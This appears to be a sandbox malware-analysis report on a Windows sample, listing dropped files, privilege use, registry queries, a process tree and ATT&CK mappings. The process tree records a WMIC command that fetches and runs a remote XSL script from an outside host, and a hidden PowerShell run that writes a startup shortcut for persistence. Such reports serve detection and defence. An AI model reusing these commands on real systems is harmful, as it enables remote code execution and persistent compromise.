6cd246cd910e33eaee00e3d138bc49fcf85562b5f8c394d4b092372d25cc0eac

Analysis

max time kernel
130s
max time network
149s
resource
win10v191014

Sharing

Copy URL

Twitter E-mail

General

Target

Supergevaarlijkk.zip
Sample

191029-p1j1431a9n
SHA256

6cd246cd910e33eaee00e3d138bc49fcf85562b5f8c394d4b092372d25cc0eac

Score

N/A

Malware Config

Signatures

Drops file in system dir 40 IoCs

description	ioc	pid	Process
File created	C:\Windows\Installer\9c11.msi	5032	msiexec.exe
File opened for modification	C:\Windows\Installer\9c11.msi	5032	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	5032	msiexec.exe
File created (read-only)	C:\Windows\Installer\MSIB083.tmp	5032	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB083.tmp	5032	msiexec.exe
File deleted	C:\Windows\Installer\MSIB083.tmp	5032	msiexec.exe
File created (read-only)	C:\Windows\Installer\MSIBB71.tmp	5032	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBB71.tmp	5032	msiexec.exe
File deleted	C:\Windows\Installer\MSIBB71.tmp	5032	msiexec.exe
File created (read-only)	C:\Windows\Installer\MSIC4B9.tmp	5032	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC4B9.tmp	5032	msiexec.exe
File deleted	C:\Windows\Installer\MSIC4B9.tmp	5032	msiexec.exe
File created (read-only)	C:\Windows\Installer\MSIC798.tmp	5032	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC798.tmp	5032	msiexec.exe
File deleted	C:\Windows\Installer\MSIC798.tmp	5032	msiexec.exe
File opened for modification	C:\Windows\Installer\	5032	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	5032	msiexec.exe
File created	C:\Windows\TEMP\~DF1AB015E267E68B85.TMP	5032	msiexec.exe
File created	C:\Windows\Installer\SourceHash{B7E63CAC-805B-4255-A63C-38D579B3EEAB}	5032	msiexec.exe
File created	C:\Windows\TEMP\~DF4059DC6BA217841D.TMP	5032	msiexec.exe
File created (read-only)	C:\Windows\Installer\MSIC95E.tmp	5032	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC95E.tmp	5032	msiexec.exe
File created	C:\Windows\TEMP\~DFC5B73261DD7F0637.TMP	5032	msiexec.exe
File created	C:\Windows\TEMP\~DFFDD148FF48F84927.TMP	5032	msiexec.exe
File deleted	C:\Windows\Installer\MSIC95E.tmp	5032	msiexec.exe
File created	C:\Windows\TEMP\~DFC4099BF753570EC0.TMP	5032	msiexec.exe
File created	C:\Windows\TEMP\~DF8FE04170370DD27A.TMP	5032	msiexec.exe
File created	C:\Windows\TEMP\~DF83CFEFF00D23A1D5.TMP	5032	msiexec.exe
File created	C:\Windows\TEMP\~DFEF13831196206515.TMP	5032	msiexec.exe
File deleted	C:\Windows\Installer\9c11.msi	5032	msiexec.exe
File created	C:\Windows\TEMP\~DF935FA8328A9511AB.TMP	5032	msiexec.exe
File created	C:\Windows\TEMP\~DF676901FE244B02F7.TMP	5032	msiexec.exe
File created	C:\Windows\TEMP\~DF805CE671641FA7FD.TMP	5032	msiexec.exe
File created	C:\Windows\TEMP\~DF342779F634A0AF27.TMP	5032	msiexec.exe
File deleted	C:\Windows\Installer\inprogressinstallinfo.ipi	5032	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	3660	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	3660	svchost.exe
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	3660	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp	3660	svchost.exe
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp	3660	svchost.exe

Loads dropped DLL 3 IoCs

pid	Process
4028	MsiExec.exe
4792	nvsmartmaxapp.exe
4788	wmplayer.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
5032	msiexec.exe
4588	powershell.exe
4788	wmplayer.exe

Drops startup file 1 IoCs

description	ioc	pid	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nvsmartmaxapp.lnk	4588	powershell.exe

Suspicious use of AdjustPrivilegeToken 55 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4812	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4812	msiexec.exe
Token: SeSecurityPrivilege	5032	msiexec.exe
Token: SeCreateTokenPrivilege	4812	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4812	msiexec.exe
Token: SeLockMemoryPrivilege	4812	msiexec.exe
Token: SeMachineAccountPrivilege	4812	msiexec.exe
Token: SeTcbPrivilege	4812	msiexec.exe
Token: SeSecurityPrivilege	4812	msiexec.exe
Token: SeTakeOwnershipPrivilege	4812	msiexec.exe
Token: SeLoadDriverPrivilege	4812	msiexec.exe
Token: SeSystemProfilePrivilege	4812	msiexec.exe
Token: SeSystemtimePrivilege	4812	msiexec.exe
Token: SeProfSingleProcessPrivilege	4812	msiexec.exe
Token: SeIncBasePriorityPrivilege	4812	msiexec.exe
Token: SeCreatePagefilePrivilege	4812	msiexec.exe
Token: SeCreatePermanentPrivilege	4812	msiexec.exe
Token: SeBackupPrivilege	4812	msiexec.exe
Token: SeRestorePrivilege	4812	msiexec.exe
Token: SeDebugPrivilege	4812	msiexec.exe
Token: SeAuditPrivilege	4812	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4812	msiexec.exe
Token: SeChangeNotifyPrivilege	4812	msiexec.exe
Token: SeRemoteShutdownPrivilege	4812	msiexec.exe
Token: SeUndockPrivilege	4812	msiexec.exe
Token: SeSyncAgentPrivilege	4812	msiexec.exe
Token: SeEnableDelegationPrivilege	4812	msiexec.exe
Token: SeManageVolumePrivilege	4812	msiexec.exe
Token: SeImpersonatePrivilege	4812	msiexec.exe
Token: SeCreateGlobalPrivilege	4812	msiexec.exe
Token: SeRestorePrivilege	5032	msiexec.exe
Token: SeTakeOwnershipPrivilege	5032	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4324	WMIC.exe
Token: SeSecurityPrivilege	4324	WMIC.exe
Token: SeTakeOwnershipPrivilege	4324	WMIC.exe
Token: SeLoadDriverPrivilege	4324	WMIC.exe
Token: SeSystemProfilePrivilege	4324	WMIC.exe
Token: SeSystemtimePrivilege	4324	WMIC.exe
Token: SeProfSingleProcessPrivilege	4324	WMIC.exe
Token: SeIncBasePriorityPrivilege	4324	WMIC.exe
Token: SeCreatePagefilePrivilege	4324	WMIC.exe
Token: SeBackupPrivilege	4324	WMIC.exe
Token: SeRestorePrivilege	4324	WMIC.exe
Token: SeShutdownPrivilege	4324	WMIC.exe
Token: SeDebugPrivilege	4324	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4324	WMIC.exe
Token: SeRemoteShutdownPrivilege	4324	WMIC.exe
Token: SeUndockPrivilege	4324	WMIC.exe
Token: SeManageVolumePrivilege	4324	WMIC.exe
Token: 33	4324	WMIC.exe
Token: 34	4324	WMIC.exe
Token: 35	4324	WMIC.exe
Token: 36	4324	WMIC.exe
Token: SeDebugPrivilege	4588	powershell.exe
Token: SeDebugPrivilege	4788	wmplayer.exe

Uses Task Scheduler COM API 1 TTPs 19 IoCs

persistence

Query Registry

T1012

description	ioc	pid	Process
Key opened	\Registry\Machine\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	4588	powershell.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	4588	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}	4588	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	4588	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\	4588	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	4588	powershell.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	4588	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\InprocServer32	4588	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\	4588	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\ThreadingModel	4588	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	4588	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	4588	powershell.exe
Key opened	\Registry\Machine\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	4588	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\Class	4588	powershell.exe
Key opened	\Registry\Machine\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32	4588	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	4588	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\AppID	4588	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	4588	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	4588	powershell.exe

Uses Volume Shadow Copy Service COM API 3 IoCs

ransomware

description	ioc	pid	Process
Key opened	\Registry\Machine\Software\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}	4588	powershell.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}	4588	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}	4588	powershell.exe

Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	pid	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	908	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	908	svchost.exe

Executes dropped EXE 2 IoCs

pid	Process
4248	lcC4E6.tmp
4792	nvsmartmaxapp.exe

Discovering connected drives 3 TTPs 1 IoCs

ransomware

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	pid	Process
File opened (read-only)	\??\C:	4812	msiexec.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5032 wrote to memory of 360	5032	msiexec.exe	76
PID 360 wrote to memory of 4324	360	MsiExec.exe	77
PID 5032 wrote to memory of 4028	5032	msiexec.exe	79
PID 3980 wrote to memory of 3700	3980	SppExtComObj.exe	81
PID 4324 wrote to memory of 4588	4324	WMIC.exe	83
PID 4028 wrote to memory of 4248	4028	MsiExec.exe	85
PID 4588 wrote to memory of 4792	4588	powershell.exe	86
PID 4792 wrote to memory of 4788	4792	nvsmartmaxapp.exe	87

Uses Volume Shadow Copy WMI provider 3 IoCs

ransomware

description	ioc	pid	Process
Key opened	\Registry\Machine\Software\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C}	4588	powershell.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C}	4588	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}	4588	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4812	msiexec.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Modify Registry

T1112

description	ioc	pid	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0"	1784	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1"	1784	svchost.exe

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\91B5DB3C0CCBD68BD04C24571E27F99D.msi
1⤵
- Suspicious use of AdjustPrivilegeToken
- Discovering connected drives
- Suspicious use of FindShellTrayWindow
PID:4812

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
1⤵
PID:4916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
PID:4952

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Drops file in system dir
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5032

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding CBFCADDEA50F5525DF9B9F6C1CD146DD
1⤵
- Suspicious use of WriteProcessMemory
PID:360

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4324

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 6122D15D3738E3CFE5A11A126B91AC11
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4028

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:3980

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
1⤵
PID:3700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
1⤵
- Suspicious behavior: EnumeratesProcesses
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Uses Task Scheduler COM API
- Uses Volume Shadow Copy Service COM API
- Suspicious use of WriteProcessMemory
- Uses Volume Shadow Copy WMI provider
PID:4588

C:\Users\Admin\AppData\Local\Temp\lcC4E6.tmp
"C:\Users\Admin\AppData\Local\Temp\lcC4E6.tmp"
1⤵
- Executes dropped EXE
PID:4248

C:\Users\Admin\AppData\Roaming\mDxOF\nvsmartmaxapp.exe
"C:\Users\Admin\AppData\Roaming\mDxOF\nvsmartmaxapp.exe"
1⤵
- Loads dropped DLL
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4792

C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4788

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Drops file in system dir
PID:3660

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4528

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
1⤵
- Checks system information in the registry (likely anti-VM)
PID:908

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
1⤵
- Windows security modification
PID:1784

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup
1⤵
PID:1052

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

MITRE ATT&CK Additional techniques

T1089

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4788-19-0x0000000006110000-0x0000000006111000-memory.dmp

Filesize
4KB

Download
memory/4788-20-0x0000000006910000-0x0000000006911000-memory.dmp

Filesize
4KB

Download